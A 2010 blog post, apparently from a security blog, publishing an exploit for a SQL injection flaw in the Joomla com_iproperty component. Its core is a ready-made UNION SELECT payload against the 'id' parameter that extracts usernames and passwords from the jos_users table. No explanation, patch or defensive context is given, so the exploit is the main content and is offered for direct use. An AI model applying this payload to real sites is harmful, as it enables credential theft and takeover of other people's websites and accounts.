Friday, July 23, 2010

Joomla Component (com_iproperty) SQL Injection Vulnerability

0

#Joomla Component com_iproperty SQL Injection Vulnerability

#General Information:
Advisory/Exploit Title = Joomla Component (com_iproperty) SQL Injection Vulnerability

#Published: 2010-07-23
----------------------------------------------------------------------------------------------------------------------------

Vulnerable File:

http://www.site.com/index.php?option=com_iproperty&view=agentproperties&id=[SQL]

ExploiT:
index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting